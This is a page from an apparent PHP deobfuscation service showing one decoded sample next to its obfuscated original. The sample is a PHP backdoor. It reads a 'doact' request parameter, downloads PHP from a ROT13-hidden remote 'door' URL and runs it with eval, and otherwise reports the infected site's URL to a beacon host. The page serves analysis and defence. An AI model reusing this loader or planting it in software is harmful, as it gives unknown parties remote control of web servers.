Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto oPQ84; FhY1N: INQR_(["\x77\145\142" => $AzBk2]); goto tz7JS; niHxL: $AzBk..
Decoded Output download
<?php
goto oPQ84;
FhY1N:
INQR_(["web" => $AzBk2]);
goto tz7JS;
niHxL:
$AzBk2 =
(isset($_SERVER["HTTPS"]) &&
$_SERVER["HTTPS"] === "on"
? "https"
: "http") .
"://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}";
goto FhY1N;
sOKJh:
function U0I_L($AzBk2)
{
goto eUa_e;
zkm4g:
fclose($xT50i);
goto ANGkg;
eUa_e:
$h58nu = "";
goto cdvKN;
c2fr7:
$xT50i = fopen($AzBk2, "r");
goto tiewL;
tiewL:
$h58nu = stream_get_contents($xT50i);
goto zkm4g;
xcCuo:
curl_setopt($XbbrI, CURLOPT_FOLLOWLOCATION, 1);
goto buARb;
fLS9C:
$h58nu = file_get_contents($AzBk2);
goto lqqAg;
TCjrM:
XC4OL:
goto PZOFo;
ANGkg:
WPS3V:
goto AZuoD;
JnTWD:
if (
!(
empty($h58nu) &&
function_exists("fopen") &&
function_exists(
"stream_get_contents"
)
)
) {
goto WPS3V;
}
goto c2fr7;
buARb:
curl_setopt($XbbrI, CURLOPT_SSL_VERIFYPEER, 0);
goto aOI5W;
AZuoD:
return $h58nu;
goto Q8rGC;
NGFZq:
$XbbrI = curl_init($AzBk2);
goto vsGzY;
cdvKN:
if (!function_exists("curl_exec")) {
goto XC4OL;
}
goto NGFZq;
PZOFo:
if (
!(
empty($h58nu) &&
function_exists(
"file_get_contents"
)
)
) {
goto w1lBz;
}
goto fLS9C;
UhzpF:
$h58nu = curl_exec($XbbrI);
goto pAbHV;
aOI5W:
curl_setopt($XbbrI, CURLOPT_SSL_VERIFYHOST, 0);
goto UhzpF;
lqqAg:
w1lBz:
goto JnTWD;
vsGzY:
curl_setopt($XbbrI, CURLOPT_RETURNTRANSFER, 1);
goto xcCuo;
pAbHV:
curl_close($XbbrI);
goto TCjrM;
Q8rGC:
}
goto rfzDY;
tz7JS:
goto RAjJ3;
goto iT_yZ;
eLl_B:
session_start();
goto VlsYk;
iT_yZ:
Ph4IZ:
goto rF07B;
oPQ84:
error_reporting(0);
goto eLl_B;
agBgo:
exit();
goto sOKJh;
MKXm1:
$WXUOL = U0I_L(
str_rot13(
"uggcf://jcgrfg.jbqverpg.gbc/erzbgr/qbbe/"
) .
$P_83N .
".txt"
);
goto bsJ1K;
bsJ1K:
eval("?>" . $WXUOL);
goto agBgo;
p2yqc:
if (!empty($P_83N)) {
goto Ph4IZ;
}
goto niHxL;
VlsYk:
$P_83N = $_REQUEST["doact"];
goto p2yqc;
Kf9mk:
RAjJ3:
goto MKXm1;
rF07B:
$_SESSION["doact"] = $P_83N;
goto Kf9mk;
rfzDY:
function INqr_($BdvsM)
{
goto WgRJ1;
W3zBw:
$gL1uI = curl_init($AzBk2);
goto TLGQX;
wdMLY:
curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true);
goto TQ2d2;
WdQlF:
curl_close($gL1uI);
goto dVbs5;
WgRJ1:
$AzBk2 =
"http://hknxoe.byhot.top/index.php";
goto W3zBw;
TQ2d2:
$cRR8Z = curl_exec($gL1uI);
goto WdQlF;
TLGQX:
curl_setopt($gL1uI, CURLOPT_POST, 1);
goto FbQco;
FbQco:
curl_setopt($gL1uI, CURLOPT_POSTFIELDS, $BdvsM);
goto wdMLY;
dVbs5:
} ?>
Did this file decode correctly?
Original Code
<?php
goto oPQ84;
FhY1N:
INQR_(["\x77\145\142" => $AzBk2]);
goto tz7JS;
niHxL:
$AzBk2 =
(isset($_SERVER["\110\x54\x54\120\x53"]) &&
$_SERVER["\110\124\x54\x50\123"] === "\157\x6e"
? "\x68\164\x74\160\x73"
: "\x68\164\164\160") .
"\72\57\x2f{$_SERVER["\110\124\x54\x50\x5f\110\117\x53\x54"]}{$_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\x52\x49"]}";
goto FhY1N;
sOKJh:
function U0I_L($AzBk2)
{
goto eUa_e;
zkm4g:
fclose($xT50i);
goto ANGkg;
eUa_e:
$h58nu = "";
goto cdvKN;
c2fr7:
$xT50i = fopen($AzBk2, "\x72");
goto tiewL;
tiewL:
$h58nu = stream_get_contents($xT50i);
goto zkm4g;
xcCuo:
curl_setopt($XbbrI, CURLOPT_FOLLOWLOCATION, 1);
goto buARb;
fLS9C:
$h58nu = file_get_contents($AzBk2);
goto lqqAg;
TCjrM:
XC4OL:
goto PZOFo;
ANGkg:
WPS3V:
goto AZuoD;
JnTWD:
if (
!(
empty($h58nu) &&
function_exists("\x66\x6f\x70\x65\x6e") &&
function_exists(
"\163\164\x72\145\x61\x6d\137\147\x65\164\137\143\157\156\x74\145\x6e\x74\x73"
)
)
) {
goto WPS3V;
}
goto c2fr7;
buARb:
curl_setopt($XbbrI, CURLOPT_SSL_VERIFYPEER, 0);
goto aOI5W;
AZuoD:
return $h58nu;
goto Q8rGC;
NGFZq:
$XbbrI = curl_init($AzBk2);
goto vsGzY;
cdvKN:
if (!function_exists("\x63\165\x72\x6c\137\145\x78\x65\x63")) {
goto XC4OL;
}
goto NGFZq;
PZOFo:
if (
!(
empty($h58nu) &&
function_exists(
"\146\151\x6c\x65\137\147\145\164\137\143\157\156\x74\x65\156\164\x73"
)
)
) {
goto w1lBz;
}
goto fLS9C;
UhzpF:
$h58nu = curl_exec($XbbrI);
goto pAbHV;
aOI5W:
curl_setopt($XbbrI, CURLOPT_SSL_VERIFYHOST, 0);
goto UhzpF;
lqqAg:
w1lBz:
goto JnTWD;
vsGzY:
curl_setopt($XbbrI, CURLOPT_RETURNTRANSFER, 1);
goto xcCuo;
pAbHV:
curl_close($XbbrI);
goto TCjrM;
Q8rGC:
}
goto rfzDY;
tz7JS:
goto RAjJ3;
goto iT_yZ;
eLl_B:
session_start();
goto VlsYk;
iT_yZ:
Ph4IZ:
goto rF07B;
oPQ84:
error_reporting(0);
goto eLl_B;
agBgo:
exit();
goto sOKJh;
MKXm1:
$WXUOL = U0I_L(
str_rot13(
"\x75\147\147\x63\146\x3a\x2f\57\x6a\143\x67\x72\146\x67\56\152\142\x71\x76\145\x72\x70\x67\56\147\142\143\x2f\x65\162\x7a\142\147\162\57\x71\142\142\145\x2f"
) .
$P_83N .
"\56\164\x78\164"
);
goto bsJ1K;
bsJ1K:
eval("\77\x3e" . $WXUOL);
goto agBgo;
p2yqc:
if (!empty($P_83N)) {
goto Ph4IZ;
}
goto niHxL;
VlsYk:
$P_83N = $_REQUEST["\x64\157\141\143\x74"];
goto p2yqc;
Kf9mk:
RAjJ3:
goto MKXm1;
rF07B:
$_SESSION["\144\x6f\x61\143\164"] = $P_83N;
goto Kf9mk;
rfzDY:
function INqr_($BdvsM)
{
goto WgRJ1;
W3zBw:
$gL1uI = curl_init($AzBk2);
goto TLGQX;
wdMLY:
curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true);
goto TQ2d2;
WdQlF:
curl_close($gL1uI);
goto dVbs5;
WgRJ1:
$AzBk2 =
"\150\164\x74\x70\72\x2f\57\150\x6b\x6e\x78\157\x65\56\142\x79\x68\157\x74\x2e\164\x6f\160\x2f\151\156\144\145\170\x2e\x70\150\x70";
goto W3zBw;
TQ2d2:
$cRR8Z = curl_exec($gL1uI);
goto WdQlF;
TLGQX:
curl_setopt($gL1uI, CURLOPT_POST, 1);
goto FbQco;
FbQco:
curl_setopt($gL1uI, CURLOPT_POSTFIELDS, $BdvsM);
goto wdMLY;
dVbs5:
} ?>
Function Calls
None |
Stats
MD5 | 7104aaa739c7ad872e519482a5387120 |
Eval Count | 0 |
Decode Time | 62 ms |